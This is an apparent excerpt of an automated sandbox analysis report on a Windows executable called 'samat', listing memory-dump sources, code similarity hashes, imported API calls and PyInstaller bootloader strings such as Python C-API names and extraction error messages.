                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                                                                      • Instruction ID: 6cfab316b1c35e622b34f53ca06304b1d700eeedaf38a7d46d691c629d7e82ee
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04410523714A5582EF04DF2ADE15669B3A5BB48FD0B899037EE0DA7B54DE7CC0428301
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                                                                                                                                                                                                                                                      • Instruction ID: 9b923509a452506fa1e046e330c882dd066f811edeefc7dc84ed88e2bc966b00
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8231E732B08B4241E764AF25AC4233DA6D8ABC4BD0F54423AEA8D57BD5DF7CD0028715
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                                                                      • Instruction ID: 980b8ad0acaaae6f3e87279186055c087afc8bd36a533f8671e79a36965bf3f6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48F044717282958ADB989F69A843629B7D0F718384F80907ED58D83B04DA7C90518F15
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                                                                      • Instruction ID: 1998452e97deb3305fc46a9cd50b2e685f72c6776930c66a0a473c380ecb34f9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EAA00121A0C84AD1E745AB10AC92225A228BB54300BC04033E10DA60A59EBDA804D662
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5840
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5852
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5889
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C589B
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C58B4
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C58C6
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C58DF
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C58F1
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C590D
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C591F
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C593B
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C594D
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5969
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C597B
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5997
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C59A9
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C59C5
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C59D7
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                                                      • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                                                      • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                                                      • Instruction ID: 984ed8757276d6120e08ce48f0a8d5039e414908a698defd7d51a856468169ef
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D522B560B09B0781FB06FB65AC167B5A3A9BF15754FC49437C42E82260EFFDB558C222
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7E12C45F4,00000000,00007FF7E12C1985), ref: 00007FF7E12C93C9
                                                                                                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7E12C86B7,?,?,00000000,00007FF7E12C3CBB), ref: 00007FF7E12C822C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C2810: MessageBoxW.USER32 ref: 00007FF7E12C28EA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                                                      • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                                                      • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                                                      • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                                                                      • Instruction ID: 2cc97a808fae56afa4ee59e3e19a0f94149b729cb8c39f9f790c874412a0d512
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C51A311B1868281FB51BB20EC573BAE259AF94780FC59433DB0E836D5EEBCE544C362
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                                                      • String ID: P%
                                                                                                                                                                                                                                                                                      • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                                                      • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                                                      • Instruction ID: ebf4d3a0c32c6121c8b71d1092ddf96f1ad691fb6c2c108c588ef25df26c52e0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD5107266047A186D7259F26E8182BAF7A1F798B61F004122EBDE83694DF7CD045CB20
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                                                      • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                                                      • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                                                      • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                                                      • Instruction ID: b530895f767a068d39fbb523c3f6f018e60985dda97c1510cd40a1c70da1ae6b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE21AD21B0864381E7426B79EC563799294FF85B90F898133DF1D833D4DEBCD5808222
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                                                      • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                                                      • Instruction ID: 1a94a1b793212a6b0b17cef60065daf4d81db9c63eb3fba2a5528fff43d401e3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0612C663F0C24386FB64BA14D9163B9F65AFB40750FC44137D6A946AC8DFBCE5848B22
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                                                      • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                                                      • Instruction ID: f235075364ba54f1f8c0bf505dd7a2df8deb66df97d2d849682a01aa40e59752
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC127363F0C18385FB646B14E856779E6A9FB40750FD84033E69A46DC4DFBCE480AB62
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                                      • Opcode ID: 0f969e6fb3265fee7630cdf4d153662912e2351cfe086ee8c9ce282ec24edd98
                                                                                                                                                                                                                                                                                      • Instruction ID: 6dbcc13cc60ab29eda98f8d574c6f0b47032779822d3011bcfdf55b575bbdc6b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f969e6fb3265fee7630cdf4d153662912e2351cfe086ee8c9ce282ec24edd98
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11415C22B0869286EB10FB11AC067B9A398BF84BC4FD44433EE4C47795DEBCE501D762
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                                      • Opcode ID: ba69cb2111a26844a3bb1f636b4ed516f2970dba1f1f6f2553b333e5179dfc8e
                                                                                                                                                                                                                                                                                      • Instruction ID: 1e45551eb6095946b4a5ee24d7cefa3ff41efbdd6b5f6c094339b1c74744a1b0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba69cb2111a26844a3bb1f636b4ed516f2970dba1f1f6f2553b333e5179dfc8e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB415D22B0854286EB11EB21AC023B9E398BB54784FD44833EE4D47A95DEBCE501D666
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                      • API String ID: 849930591-393685449
